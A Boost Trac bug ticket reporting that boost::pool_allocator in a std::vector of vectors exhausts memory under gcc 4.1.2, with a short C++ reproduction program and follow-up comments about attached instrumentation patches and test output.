file is probably something like:
clj
(ns myapp.core (:require [om.core :as om]))
And so, whenever we type
om/something, we refer to
something within the
om.core namespace.
Note that ClojureScript allows you to
refer symbols so that you can use them
without any qualification, for example we could've done the following:
clj
(ns myapp.core (:require [om.core :as om :refer [root]])) (root arg1 arg2 arg3)
You see what I'm getting at.
Then we have array syntax:
clj
(def heroes ["Samus" "Peach" "Sarah Kerrigan"])
Like arguments to a function, arrays are space-separated. Maps are about the same, except you need to have an even number of elements and the odd ones are the keys.
Usually we'll use symbols instead of strings as map keys:
clj
(def langs {:clojure "JVM" :haxe "Neko" :vala "GLib"})
As for functions definitions, they look like a call as well:
clj
(fn [a b c] (log "In a function somewhere!") (+ a b c))
Now with our newly-acquired notions, let's go back to our original code:
clj
(om/root (fn [app owner] (reify om/IRender (render [_] (dom/h1 nil (:text app))))) app-state {:target (. js/document (getElementById "app"))})
We have a call to om/root, and the first argument is a function:
clj
(fn [app owner] (reify om/IRender (render [_] (dom/h1 nil (:text app)))))
The function returns a type - really, an interface implementation if you ask me:
clj
(reify om/IRender (render [_] (dom/h1 nil (:text app))))
So, we implement the
om/IRender interface, and it has only one method:
clj
(render [_] (dom/h1 nil (:text app)))
It takes one argument, which we bind to
_ to mark that we really don't care
about it (in this case it's the local state of the component, but let's not get
into this...)
And then we call the
h1 dom construction function, with no special options
(nil is Clojure for null), and what the value for the key
:text stored in app.
In the interest of clarity,
(:text app) is roughly equivalent to
(get app :text),
or
app['text'] in JavaScript.
The second argument to
om/root is simply
app-state, an atom (we'll get back to that).
And the third argument is a map, with a single key,
:target, whose value is:
clj
(. js/document (getElementById "app"))
That's ClojureScript/JavaScript interoperability - equivalent to the following JavaScript:
JavaScript code
document.getElementById('app')
Now that we've learned a few basics to be able to read ClojureScript code, what does
this actually do? Well, anything implementing the
om/IRender interface is an Om
component, and calling
om/root mounts it to a DOM element somewhere. Somewhere
in our HTML, we probably have that:
html
<div id="app"></div>
And in there we'll have an
h1 tag containing whatever is in
(:text app).
So then, how do we put stuff in the app state? As we mentioned earlier,
app-state is an
atom. We could define it like that:
clj
(def app-state (atom {:text "Initial text"}))
And then, if we want to change the text, we can do:
clj
(swap! app-state assoc :text "New text!")
Which is really just a shorthand for:
clj
(swap! app-state #(assoc % :text "New text!"))
Itself a shorthand for:
clj
(swap! app-state (fn [state] (assoc state :text "New text!")))
What does
swap! do? Well, an atom is basically a reference to a value. The
value itself is immutable, as all Clojure data structures, but we can change
the reference to something else.
So, wherever in Ractive you'd do
state.set(key, value), changing the state
itself, in ClojureScript you'd rather swap the reference to a slightly changed
version of the state.
However, the whole state isn't copied - the parts that didn't change are immutable as well, so they're just referenced from the new data structure.
Let's take a more complex state as an example.
clj
(let [state (atom {:a [1 2 3] :b {:first-name "John" :last-name "Doe"}})] (log "Old state: " (pr-str @state)) (swap! state assoc :a [4 5 6]) (log "New state: " (pr-str @state)))
In this example, not only are the old and new
(:b @state) value-equal but
they're also reference-equal - they're the same data structures, at the same
place in memory.
Note:
@some-atom is the atom dereference operation. It evalutes to the value
the atom references, rather than the atom itself. And
pr-str is basically
a
toString.
So, whenever the state atom is changed, comparing the old state and the new state
is very fast - still in our "John Doe" example above, no need to compare
whether
(:first-name (:b @state)) has changed, for example - we can see that
(:b @state) still has the same address, so all the substructure has to be
the same - because of immutability.
Even when the app state gets complicated, small updates to part of the state tree are still fast, because it's inexpensive to find out which parts of the tree are changed. Hence, only the minimal amount of re-rendering is done.
Exit Om
It might not seem like much, but writing all those
reify forms and having to
require and call methods for every dom element get old really quick. Call me
impatient, but I knew there was something simpler lurking around the corner.
And there was! Reagent provides a much simpler interface to React. So, in the same ballpark as Om but without all the running around in circles.
In reagent, components are simply functions, and HTML tags are specified as keywords, with a Hiccup-like syntax.
For example, I love FontAwesome icons. Here's a simple component that displays the icon of your choice:
clj
(defn fa-icon [icon] [:i {:class (str "fa fa-" icon)}])
Using it is as simple as any HTML tag:
clj
(defn profile [user] [:div.user [:h2 (:name @user)] [:p (:bio @user)] [:span.button {:on-click #(follow user)} "Follow " (:name @user) [fa-icon "star"]]])
That would produce HTML like:
html
<div class="user"> <h2>The Jester</h2> <p>Some obscure hacker at some point in the internet's history.</p> <span class="button"> Follow The Jester <i class="fa fa-star"></i> </span> </div>
I was pretty happy with Reagent, and wrote the UI for the memoways issue tracking system in it. It works very well, and I can prototype quickly, although errors are still kind of painful.
ClojureScript: the bad
But now I'm seriously looking at ClojureScript alternatives.
I was okay with having to learn a completely new build tool, leiningen. In fact, it's really nice to have mostly one tool to interact with for the whole language.
I was okay with ugly JavaScript interop, leading to code like this:
clj
(.getElementById js/document (.- value (.- target e)))
I was okay with syntax errors yielding 50-lines-long stacktraces in my console.
I was even okay with the REPL taking around 4s to start (on a 2.2Ghz Core i7 with a recent SSD).
But I'm not okay with the completely erratic behavior of
lein-cljsbuild and
the Google Closure compiler.
Let me get you up-to-speed on the whole ClojureScript/Closure shenanigans.
Google Closure compiler has two main components:
- An SDK covering a lot of ground
- An optimizing/minifying JavaScript compiler
ClojureScript relies on the former to reimplement most of the Clojure standard library in JavaScript (while also using its module loading facilities), and on the latter to keep the compiler's output to reasonable sizes.
And by "reasonable size" I mean 330k minified, 80k minified+gzipped, with
just a few libraries. Turns out
cljs.core (imported by default) is huge.
Like, over nine thousand lines in a single file huge.
In dev, it's not that bad. Sure, you have to go through a few hoops, like
figuring out the right options to put in your
project.clj, including some
goog/base.js file on top of your
yourproject.js file and having an
inline JavaScript call to
goog.require.
With all that figured out, it's really not that bad. Again, in dev.
Recompilations with
lein cljsbuild auto dev are fast, around 200ms, it loads
all dependencies correctly with XHR calls (about 20 separate .js files to do
anything useful), everything's fine.
In production, it's another story entirely. First off, you want to set
the Closure compiler to perform
advanced optimizations. Basically it'll attempt
to:
- Perform dead code elimination (remove the parts you don't need)
- Minify by renaming symbols (variables, functions) to shorter things like
Glor
aQinstead of
reverseor
forEach
- And of course, removing all the whitespace it can get away with.
So first off, it's slow. It's really really slow. If you have 9000+ lines of ClojureScript as input, you can imagine how much JavaScript it spits out. The Closure compiler has several megabytes of JavaScript to chew through, and it's not uncommon for it to take around 30 seconds to process completely.
Second, you have to be extra careful about foreign libraries. Because:
- Chances are, they don't use the google module system at all (
goog.require,
goog.provide, etc.)
- They define symbols that can not be renamed by the closure compiler in your code.
But there's a thing for that! Just add them to an
externs list as an option
to the compiler and you're good to go. Except, again, it's slow. Very slow.
And it won't hesitate to emit thousands of warnings on sources over which you
have absolutely no control.
And if it wasn't enough, once it's done taking dozens of seconds compiling all
that stuff - sometimes it just emits erroneous code. I suspect that, when scanning
a directory for sources files, the tree it constructs is wrong, because if you
run it in
watch mode (so that it recompiles automatically on file changes)
and touch just the right file (the one you'd pass to the compiler if it did
allow that), then it takes another 8 to 10 seconds and generates
correct code.
Oh, and if you want to modularize your codebase, say you want to output
one .js file per "view type" of your application, say one for the issue tracker
UI, one for the client-side slideshow visualizer, etc. - not only do you have
to maintain a contrived directory infrastructure and specify tons of
redundant dependencies in your
project.clj - you also get the
30s to get the wrong code then 10s to get the right one but only if you launch it in watch mode for every separate target file you want to have.
In that light, it appears that ClojureScript is - currently - quite painful to use in production. Sure, the tooling may improve in the coming months, but in a fast-moving world, I don't really have the time to wait.
Honestly, the ecosystem feels just wrong - even though I love reading Clojure code (the language itself is a pleasure) - and it's full of nice people, fetching .js files as a .pom + .jar from a Maven repository... it feels wrong, and so dissociated from the rest of the JavaScript world.
Mori + Sweet.js = Ki
When looking for alternatives, I knew that I wanted something:
- Lighter than ClojureScript
- With a similar syntax (S-exps are <3)
- With immutable data structures.
Ki is just that. It uses mori, which brings ClojureScript's data structures, and is, besides that, mostly a set of sweet.js macros to turn S-expression back into good ol' JavaScript.
I won't detail the whole language, it has a reference page on the website.
The main differences from ClojureScript are missing features (at the time
of this writing: destructuring assignment is the one I miss the most), and
snake_case instead of
kebab-case.
Of course, a bunch of macros (as sophisticated as they might get) will never do as much as a full compiler will - but in this case, it's kind of the point. A compiled ki program is usually pretty small, the only constant cost being mori, which is rather small (by cljs standards).
Ki presents itself as a JavaScript script, the command-line tool provided with the distribution is ran with Node.js by default. After having played around with the language a bit, I was seduced. Moving on to the next problem: how the hell do I integrate that to my Rails application?
With ClojureScript, I had given up - even though Rails asset pipeline support
for ClojureScript does exist, the documentation made it clear that it had
to spin up a JVM each time any asset was modified. So I was just using the
lein cljsbuild auto command by hand.
In Ki's case, though... I had a feeling we might do better. A lot better.
We could, obviously, hook into the Rails asset pipeline and, when, a
.ki.js file
needs to be compiled, write it to a temporary file, then call the
ki command-line
tool on it, ask it to write to another temporary file, then read that file and
return it to Rails.
But that's no fun at all! There's a reason tools like the Coffee compiler, sass compiler, ki compiler, have "watch" modes - they take longer to initialize than they do to recompile something. And we only need to pay that cost once.
So, let's go with a much harder - but more rewarding - alternative. Keeping our own instance of V8 around and running the ki compiler through that. A handy way to interact with v8 from Ruby is therubyracer. Ideally we'd use something runtime-agnostic like execjs - but we'll have enough trouble making our stuff work in a single JavaScript engine like that.
therubyracer is very nice to play with. The first thing we want to do is create a context.
ruby
context = V8::Context.new
Then we can eval some JavaScript expressions in it:
ruby
context.eval("2 + 2") # => 4
You can interact with JS expression from Ruby, for example, JS arrays
come back as
V8::C::Array instances, which you can coerce to real ruby
arrays, or just iterate with each.
ruby
context.eval("[1, 2, 3]").to_a # => [1, 2, 3]
Similarly, you can iterate over JavaScript objects (ie. dictionaries/maps) with each if you want.
ruby
context.eval("{a: 'apple', b: 'bananas'}").each do |key, val| puts "#{key} => #{val}" end # prints: # a => apple # b => bananas
The context retains globals across eval calls, so we can store whatever
we want in
this (the equivalent of
window when there's no browser around.)
ruby
this.$modules = {}
As always, though, globals are evil, if only because they might collide with other globals, so we'll use that sparingly.
We can load JavaScript files via eval using a little trick to escape the string properly:
ruby
require 'multi_json' source = File.read("foobar.js") context.eval %Q{ // preamble #{MultiJson.dump(source)} // epilogue }
This approch has an advantage - you can fence the code with a preamble and epilogue
of your choice. You can make your code execute within a scope where you override
some variables, like
define or
exports for example.
If you don't need to do that, you can just tell V8 to load the file directly:
ruby
context.load("foobar.js")
In this case, you don't control the scope the file is evaluted in (it's always the global scope) - but you do retain file / line number information within stack traces, which is invaluable.
So, now that we know how to evaluate arbitrary code within V8, and retrieve
the results, and how to load any JS file in it, we're done right? We just
load
ki.js, call
ki.compile and be on our merry way. Right? Riiiiiight?
JavaScript loaders
Wrong. You see, in the JS world (the real, vibrant, "god save us lest we forget a var" JS world, not the compiles-to-JS world), they've been busy figuring out the best way to have modular code that can be loaded in different environments (say, Node.js, or a browser module loader).
The idea is for libraries to avoid clobbering the global scope with stuff like
_, or
$, or
jQuery, or
React, or whatever variable they've chosen.
That's why it's not uncommon to see JS libraries nowadays structured like this:
JavaScript code
(function(root, factory) { if (typeof exports === 'object') { // Node.js-style require factory(exports, require('dep1'), require('dep2')); } else if (typeof define === 'function' && define.amd) { // AMD-style define define(['exports', 'dep1', 'dep2'], factory); } else { // Fuck-it style "let's pollute the global scope" // if you haven't included 'dep1.js' and 'dep2.js' before, this will break. var exports = {}; factory(exports, Dep1, Dep2); root.mylib = exports; } }(this, function (exports, dep1, dep2) { // we can access dep1 & dep2 here. mostly. exports.something = something; exports.somethingElse = somethingElse; }));
In the case of
ki.js, the main file for the ki compiler, the
fuck-it style
isn't included at all. Which means we can't get away with the naive gross approach
of just loading everything in the right order, crossing our fingers, and sacrificing
a virgin veal to the gods of globals.
The Node.js style is kind of painful to handle for us from the Ruby side.
Whenever
require is called, something must be done - but we load files not by XHR
like some JS module loaders do, but by reading files from the filesystem ourselves
(or calling
context.load, or...). Point is - we need some way to get back to the
Ruby side from that JS call.
I know that it's possible. In particular, commonjs.rb does it - but it doesn't solve problem #2 with this approach, which is that the ki compiler and its dependencies assume that, if it's loaded with the Node.js style, it can access Node.js modules such as "fs" (the async, libuv-based thingy to interact with the filesystem. so cute.) And since we're running in V8, not in node.js, we have zero access to that kind of module. We'll do the I/O ourselves, thank you very much.
Which leaves us with the AMD approach - the cleanest, in my view. I like the idea.
Each module calls
define with a list of dependencies, and a factory function that
should be called with these dependencies.
It leaves us plenty of time to inspect those 'module specifications' from the Ruby side, load the dependencies and then pass them back to the factory function.
Now, at this stage of my journey I've lost a lot of time trying to do something sane.
I thought - well it's easy: we'll start by loading up
ki.js, then see what its
dependencies are, then load them up, see what their dependencies are and so
forth until we have a complete dependency graph. Then we know in which order to call
the factory functions.
It looked a little bit like this:
ki => exports sweet sweet => exports underscore parser expander syntax text!./stxcase.js escodegen escope underscore => parser => exports expander expander => exports underscore parser syntax scopedEval patterns escodegen syntax => exports underscore parser expander escodegen => exports escope => exports estraverse scopedEval => exports patterns => exports underscore parser expander syntax estraverse => exports
Or, in graphviz form:
From this graph, though, it's immediately apparent that we have a serious problem.
Circular dependencies are lurking everywhere!
parser depends on
expander, but
expander depends on
parser as well. And many others.
So, my beautiful plan of loading everything in order has quickly fallen apart. Instead, we can do the next best thing: load them in the order they are required, and when something's not properly loaded yet, reserve a empty-object space in our modules list that we'll pass to the dependants. I suspect that's how most AMD loaders work, because this approach actually worked.
In the case of ki-rails, I've decided to store modules in a global object, so that I can easily access them later. At the time of this writing, the code isn't entirely cleaned up, so don't hit me with a large trout - just be patient.
There's a few things I haven't mentioned yet, but need to be taken care of:
- First off,
exportsis a special requirement. It's not a js file we load, it's the object in which all the exported symbols of a library will be stored. That must be accounted for.
- Second, my dependency graph only shows sanitized module names. In the real world, it's not uncommon to see modules require
./moduleor
module.jsinstead of just
module
- Thirdly, AMD loaders allow two different define signatures - one that goes: name, dependencies, factory, and an anonymous one. Most modules I've encountered use the latter, but named modules exist (within the sweet.js codebase) and must be handled correctly.
- Lastly, dependencies starting with
text!are not JavaScript files and must be passed as a string without any evaluation, to the module asking for it.
With all that, we can finally call our ki compiler from V8, a naive version of which looks something like:
ruby
# sweet.js macros for ki (actually implement the language) ki_core = File.read("ki.sjs") # our ki.js code that we want to compile. source = File.read("somefile.ki.js") ret = context.eval %Q{ var ki = __modules.ki; var options = {}; options.ki_core = #{MultiJson.dump(ki_core)}; var source = #{MultiJson.dump(source)}; ki.compile(source, options); } ret[:code] # => our compiled JavaScript code!
However, this approach is pretty naive:
- It parses the ki core macros every time
- It has no source map support
Source map support
Thankfully, Sweet.js has source map support built-in. And the ki compiler interface allows its usage, like so:
JavaScript code
options = { source: source, ki_core: ki_core, sourceMap: true, filemap: "path/to/yourfile.js.ki", mapfile: "path/to/yourfile.map" } ret = ki.compile(source, options); ret.sourceMap // => the sourceMap content ret.code // => the compiled JavaScript code, including the sourceMappingURL comment.
To hook that into ki-rails, I took inspiration from Mark Bates'
coffee-rails-source-maps. Basically, the original ki file along with its source
file are written into
public/assets/source_maps and the correct URL is specified
in
sourceMappingURL, in the compiled JavaScript file.
Apart from erroring in production because the server was very protective about where the web app could and could not write, it worked very nicely!
Macro support and speed
I said one of the problems with our approach, was that the ki macros were being parsed everytime. This is actually pretty slow. At the time of this writing, they only amount to about 900 lines of rules, but the sweet.js parser is quite an involved piece of work, and as such, I was seeing end-to-end compilation times of about a second or two.
We can avoid that by precompiling
ki_core and keeping it around in the global
context.
ruby
context.eval %{Q this.__macros = sweet.loadModule(#{MultiJson.dump(ki_core)}); }
And then, later, passing it as the
modules option to the ki compiler instead of
passing the
ki_core option.
This has a negative side-effect, however. See, the ki compiler has a piece of code like this:
JavaScript code
if (!options.modules && options.ki_core) { var module = joinModule(src,options.ki_core,options.rules); options.modules = sweet.loadModule(module); }
ie. when passed the source of the ki macros instead of pre-compiled modules,
it calls
joinModule on the input (ie. src) and the ki macros, then asks
sweet to load that. What does
joinModule do exactly?
JavaScript code
var joinModule = function(src, ki_core, additionalRules) { rules = additionalRules || []; rules.push(parseMacros(src)); return ki_core.replace('/*__macros__*/',rules.join('\n')); }
How interesting! A
parseMacros method. That's where I saw that my little
trick didn't quite work. Sure, it made compilations faster, but it broke
ki macro support.
To understand why, we have to learn a bit more about how ki macros and how ki is implemented. Ki is implemented, as previously mentioned, via a set of sweet.js macros. They look like that.
JavaScript code
macro _arr { rule { () } => { } rule { ($arg) } => { _sexpr $arg } rule { ($arg $args ...) } => { _sexpr $arg, _arr ($args ...) } }
The largest macro, by far, is
_sexpr. It contains rules like:
JavaScript code
rule { (fn [$args ...] $sexprs ...) } => { function ($args(,)...) { _return_sexprs ($sexprs ...) } }
That's the anonymous function definition syntax! Sweet.js is definitely readable. Here's an example of ki macro in action:
JavaScript code
ki macro (thunk $body ...) (fn [] $body ...) ki (thunk (alert "Whoops!"));
The
parseMacros call we've seen earlier in the ki compiler looks for
the "ki macro" string with a regular expression, then converts the
definitions to sweet.js rules, like so:
JavaScript code
var rules = macros.map(function(macro) { return 'rule { ' + macro[0] + ' } => { _sexpr ' + macro[1] + ' }' });
That leaves us with this mysterious line in joinModule:
JavaScript code
return ki_core.replace('/*__macros__*/',rules.join('\n'));
Apparently it's replacing a comment within the ki core macros' source with the user's macro definitions. Why is it doing that? Let's see where it gets inserted:
JavaScript code
macro _sexpr { rule { () } => { } /*__macros__*/ /* ... rest of the _sexpr macro */ }
Of course! It's smack dab in the middle of the
_sexpr macro, so that we
may use ki user-defined macros anywhere in an S-expression.
However, it's bad news for our Asset pipeline integration dreams. Does this mean that if we want to support user-defined ki macros, we'll have to recompile the whole thing every time, and thus have a minimum of 1-2s compilation time?
Sprockets dependencies
Not so fast! First off, ki has no concept of
import or
require or
include.
It allows one to define namespaces, but there's no built-in support for importing
other files, unlike, for example, sass. (Not a language that compiles to JS, but
it is well-supported by rails and has its own @import statement).
So, we have to fall back to the next best thing: Sprockets directives. Sprockets is the little processing meta-engine that could, powering the whole Rails asset pipeline, from preprocessing to transforming to postprocessing to fingerprinting, manifest-generating, caching, and serving-with-the-right-headers.
As anyone who has written JavaScript or CoffeeScript in Rails, Sprockets has
directives, the most used of which are
require,
require_tree and
require_self:
JavaScript code
//= require preamble //= require_self //= require_tree ./components console.log("This will be between preamble and all things in ./components");
Now, since we want to write modular ki code, we want to be able to require stuff.
In the case of functions, the ki compiler doesn't have to know about it. They're just regular JavaScript functions, it's not like any compilation-time checking is done.
In the case of macros, however, the ki compiler has to know about every macro definition in the dependencies of our file, so that it may apply the right transformations.
In other words, we need to do the following (in pseudo code):
text
when compiling a ki file within Rails: - figure out all the files it requires - read them all - concatenate them in a single string - extract only the macro definition parts - load them with sweet.js - pass them to the ki compiler.
Now, the Sprockets API is not that hard to figure out, although I wish better documentation existed on the subject. Turns out, from within a tilt template called by Sprockets, like this one:
ruby
class KiTemplate < Tilt::Template def prepare # must be defined end def evaluate(scope, locals, &block) # here's the magic compile(data) end end
..we can access the set of dependencies with a simple
scope._dependency_assets, and we can even coerce it to an array with a
.to_a call. Giving us something like:
ruby
["/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments.js.ki", "/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments/console-log.js.ki", "/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments/macro-usage.js.ki", "/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments/macro.js.ki", "/Users/amos/Dev/memoways/memowaysv2/app/assets/javascripts/experiments/take-range.js.ki"]
Reading all those files and concatenating them is done in two lines of Ruby.
Extracting the macro part can be done by calling the JS method
ki.parseMacros
via our V8 context and all that's left is to call
sweet.loadModule and pass
the result to the ki compiler.
Of course, that only solves the problem of "if A requires B, A should be able to use macros defined in B". It doesn't solve the problem of "I want compilations to be fast because brain switches are expensives".
However, we can easily solve that with a simple cache. I've opted for a very
naive solution for the time being: I simply have a global object
__macrocache
in the V8 environment that stores compiled macros, indexed by the SHA-1 hash
of their sources.
Often, I'll change the ki code without touching any macro definition. In that case, the SHA-1 of the macro sources stays the same, and no reloading of the sweet.js module happens. In that case, recompilation time is not even noticeable!
If you liked this article, please support my work on Patreon! | https://fasterthanli.me/articles/sexps-in-your-browser | CC-MAIN-2021-25 | refinedweb | 5,534 | 64.3 |
Hi, im currently studying for my final test in java beginner class, so there is a problem that i couldn't solved until now, i'm totally beginner and have search the solution for almost two days :(
The program is taking variabel n from other text file, then this n will be used as the amount of randomize data, after we get the random array we need to sort and reserve it, so far i could make the sort but not with the reverse, please somebody give a solution what should i do to make a reserve/descendant int array in output
import java.io.FileInputStream; import java.util.*; public class SortReserve{ public static void main(String []args) throws Exception{ Scanner input = new Scanner(System.in); Random rnd= new Random(); Scanner fs; int deret; String filename; int n; System.out.print ("Nama File : "); filename = input.nextLine(); try { fs = new Scanner (new FileInputStream(filename)); while (fs.hasNext()){ n=fs.nextInt(); System.out.printf("\n N : %d%n\n",n); int [] menaik = new int [n]; for(int i=0;i<menaik.length;i++){ menaik[i]=(rnd.nextInt(100)+1); Arrays.sort( menaik ); System.out.println("Menaik\n"); System.out.printf("%5d ",menaik[i]); }System.out.println("\n"); } fs.close(); } catch (java.io.FileNotFoundException e){ System.err.println ("Can't make the file "+ filename); System.exit(-1); } catch (SecurityException e){ System.err.println("Accses denied"); System.exit(-1); } } }
I've tried compare and just found out it only works for string array, i've search how to convert int array to string but didn't work out, any help and solution really appreciated :)
NB : you need any text file contains a number when running this program | https://www.daniweb.com/programming/software-development/threads/293364/need-help-reversing-integer-array | CC-MAIN-2018-30 | refinedweb | 283 | 56.45 |
Walk-through — install Kubernetes to your Raspberry Pi in 15 minutes
Here’s something you can do before work, with your morning coffee, or whilst waiting for dinner to cook of an evening. And there’s never been a better time to install Kubernetes to a Raspberry Pi, with the price-drop on the 2GB model — perfect for containers.
I’ll show you how to install Kubernetes to your Raspberry Pi in 15 minutes including monitoring and how to deploy containers.
The bill of materials
I’ll keep this quite simple.
- Raspberry Pi 4, with 2GB or 4GB RAM — the 2GB is the best value, 4GB is best if you don’t plan on doing clustering.
- SD card — 32GB recommended, larger is up to you, but Kubernetes writes to disk a lot and could kill a card, so I tend to prefer buying more smaller cards.
- Power supply — you need the official supply, I know it’s expensive, but that’s for a reason. Don’t be cheap because you’ll buy twice.
If you’d like some links, you can find them in my home-lab post: Kubernetes Homelab with Raspberry Pi and k3sup.
Flash the initial OS
There are so many ways to install an Operating System, but I recommend Raspbian and the Lite edition which ships without a UI.
Once you download the image, you can use Etcher.io from our friends at Balena to flash it without even unzipping it. How cool is that?
Before you boot up that RPi, make sure you create a file named
ssh in the boot partition. If on a Mac you'll see that gets mounted for you as soon as you eject and re-insert the SD card.
Connect for the first boot
Now connect to the Raspberry Pi over your local network, it will show up as
raspberry.local, but if you can’t connect for some reason, then install
nmap and run
nmap -sP 192.168.0.0/24 to run a network scan.
- Change the password with
passwd pi.
- Run
raspi-configand change the memory split to
16mb, so that we have all the RAM for Kubernetes, believe me, it needs it.
Get your CLI tools
Now on your laptop you’ll want a few tools. We don’t need to log into the RPi again, we’ll use it as a server, remotely.
- Install kubectl — the Kubernetes CLI
- Install k3sup — the Kubernetes (k3s) installer that uses SSH to bootstrap Kubernetes
curl -ssL | sudo sh
k3sup install can be used to install k3s as a server, to begin a new single-node cluster (that’s what we’ll do today). If you have multiple nodes, then the
k3sup join command lets you add in additional agents or workers to expand the capacity.
- Install arkade, to get Kubernetes apps the easy way
curl -sSL | sudo sh
arkade installs apps, the easy way, using their upstream helm charts, but hiding away the gory and boring details.
Install Kubernetes with k3sup and k3s
k3s is a lightweight edition of Kubernetes made by Rancher Labs, it’s suitable for production, but also perfect for small devices like our Raspberry Pi. Its memory requirements are around 500MB for a server vs. around 2GB for kubeadm (upstream Kubernetes)
export IP="192.168.0.1" # find from ifconfig on RPi
k3sup install --ip $IP --user pi
In a few moments you’ll receive a kubeconfig file into your local directory, with an instruction on how to use it.
Find the node, and check if it’s ready yet
export KUBECONFIG=`pwd`/kubeconfigkubectl get node -o wide
You can add
-w to most kubectl commands to “watch” or “stream” the output status, so you can save on typing.
By default k3s comes with the metrics-server, which is used for Pod autoscaling and getting memory/CPU for pods and nodes:
kubectl top node
kubectl top pod --all-namespaces
Now let’s install one or two apps, run
arkade install to see what's available, but not that not all projects in the CNCF landscape work on ARM devices
arkade install --helpAvailable Commands:cert-manager Install cert-manager
chart Install the specified helm chart
cron-connector Install cron-connector for OpenFaaS
crossplane Install Crossplane
docker-registry Install a Docker registry
docker-registry-ingress Install registry ingress with TLS
info Find info about a Kubernetes app
inlets-operator Install inlets-operator
istio Install istio
kafka-connector Install kafka-connector for OpenFaaS
kubernetes-dashboard Install kubernetes-dashboard
linkerd Install linkerd
metrics-server Install metrics-server
minio Install minio
mongodb Install mongodb
nginx-ingress Install nginx-ingress
openfaas Install openfaas
openfaas-ingress Install openfaas ingress with TLS
postgresql Install postgresql
Let’s try the Kubernetes dashboard?
arkade install kubernetes-dashboard
The installation script prints out how to use the app, and
arkade info can show us the same information later too.
#To forward the dashboard to your local machinekubectl proxy#To get your Token for logging inkubectl -n kubernetes-dashboard describe secret $(kubectl -n kubernetes-dashboard get secret | grep admin-user-token | awk '{print $1}')# Once Proxying you can navigate to the below
Paste in your token
Now enjoy the dashboard:
Let’s install another popular application, openfaas. OpenFaaS gives us a simple way to deploy functions and microservices to Kubernetes with built-in auto-scaling.
arkade install openfaas
Here’s the post-install information:
# Get the faas-clicurl -SLsf | sudo sh# If basic auth is enabled, you can now log into your gateway:PASSWORD=$(kubectl get secret -n openfaas basic-auth -o jsonpath="{.data.basic-auth-password}" | base64 --decode; echo)
The IP of my RPi is 192.168.0.201, so I can access OpenFaaS using a NodePort of 31112.
export OPENFAAS_URL= -n $PASSWORD | faas-cli login --username admin --password-stdinfaas-cli store list --platform armhffaas-cli store deploy figlet --platform armhffaas-cli list
Now open the OpenFaaS UI and check your figlet function using or the equivalent.
You can also build your own functions with Python, Go, JavaScript and many other languages.
If you have a Docker Hub login, then you can try the following, but you’ll need to run it on a separate Raspberry Pi, with
docker installed (
curl -sSL | sudo sh)
export USERNAME=alexellis2
docker login -u $USERNAMEfaas-cli template store pull golang-http
faas-cli new --lang golang-http --prefix=$USERNAME my-apifaas-cli up -f my-api.yml# Now invoke your functionfaas-cli invoke my-api -f my-api.yml
You can also edit the function’s code and then run
faas-cli up again:
Contents of:
my-api/handler.go
package functionimport (
"net/http"
"github.com/openfaas-incubator/go-function-sdk"
)func Handle(req handler.Request) (handler.Response, error) {
return handler.Response{ Body: []byte(`Run k3s on your RPi!`),
StatusCode: http.StatusOK,
}, nil
}
Find out more about OpenFaaS at openfaas.com
You can also see your functions on the Kubernetes Dashboard:
Get a public IP for your cluster
You can get a public IP for your cluster via a tunnel using the popular Open Source project inlets.
Find out how in this tutorial — which combines cert-manager, nginx-ingress (or Traefik) and the inlets-operator.
Wrapping up and next steps
If you want to take things further, you can start adding additional nodes into the cluster, to extend its capacity and to give redundancy.
- Kubernetes Homelab with Raspberry Pi and k3sup
- arkade by example — Kubernetes apps, the easy way (tutorial primarily for PC/cloud)
- Star/fork k3sup on GitHub ⭐️
- Star/fork arkade on GitHub ⭐️
You can connect with the OpenFaaS community — to talk about Kubernetes, ARM, Raspberry Pi clusters and serverless. Join our Slack workspace today. | https://medium.com/@alexellisuk/walk-through-install-kubernetes-to-your-raspberry-pi-in-15-minutes-84a8492dc95a | CC-MAIN-2020-16 | refinedweb | 1,276 | 57.61 |
NAME
access - check user’s permissions for a file
SYNOPSIS
#include <unistd.h> int access(const char *pathname, int mode);’s real UID and GID, rather than with the effective IDs as is done when actually attempting an operation. This is to allow set-user-ID programs to easily determine the invoking user.
ERRORS
access() shall fail if: EACCES The requested access would be denied to the file or search permission is denied for one of the directories in the path prefix of pathname. (See also path_resolution(2).) ELOOP Too many symbolic links were encountered in resolving pathname.. EROFS Write permission was requested for a file on a read-only filesystem..
RESTRICTIONS
access() returns an error if any of the access types in the requested call fails, even if other types might be successful. access() may not work correctly on NFS file systems with UID mapping enabled, because UID mapping is done on the server and hidden from the client, which checks permissions., 4.3BSD
SEE ALSO
chmod(2), chown(2), open(2), path_resolution(2), setgid(2), setuid(2), stat(2) | http://manpages.ubuntu.com/manpages/dapper/man2/access.2.html | CC-MAIN-2015-35 | refinedweb | 181 | 54.73 |
Ticket #4960 (closed Bugs: fixed)
boost::pool_allocator for vector of vectors exhausts memory
Description
glr9940 reported in #386 that using boost::pool_allocator for a vector of vectors caused problems. I have now found a slight extension to the example glr9940 reported which does not crash, but exhausts memory even for a tiny vector of vectors.
I have used the development trunk code and gcc 4.1.2.
#include <boost/pool/pool_alloc.hpp> #include <vector> #include <iostream> typedef std::vector<int, boost::pool_allocator<int> > EventVector; typedef std::vector<EventVector> IndexVector; int main() { IndexVector iv; int limit = 100; for (int i = 0; i < limit; ++i) iv.push_back(EventVector()); std::cout << "it works\n"; return 0; }
I suspect that the critical value for 'limit' depends on the machine. On my machine a limit of 20 seems to work fine, a limit of 24 uses a few Gb of memory, while a limit of 30 stalls the process, 'top' showing that the memory footprint doubles rapidly until memory is exhausted. I've noticed for other examples of this issue that when I replace the vector push_back loop with a rolled out version just creating a number of pooled vectors, it works fine.
Have I made some noob mistake, or is this a bug?
Attachments
Change History
Changed 5 years ago by steven_watanabe
- attachment singleton_pool.hpp.patch
added
Patch adding instrumentation to singleton_pool
Changed 5 years ago by mattiasg
- attachment poolalloctest2_rhel5
added
Output of the modified test program with the patched singleton_pool.hpp
comment:2 Changed 5 years ago by mattiasg
On a Suse 11 machine with gcc 4.3.4 I cannot reproduce the problem, but on a RHEL5 machine with gcc 4.1.2 a run with your patched singleton_pool.hpp produces the output which I've attached to this issue. To avoid crashing the server I ran the test on I had to abort the program around the time it used half (~16Gb) of the available memory.
comment:3 Changed 5 years ago by steven_watanabe
Sorry for the delay. The file you attached is an executable. I don't think it's the output.
Changed 5 years ago by mattiasg
- attachment rhel5_out2
added
Proper output file
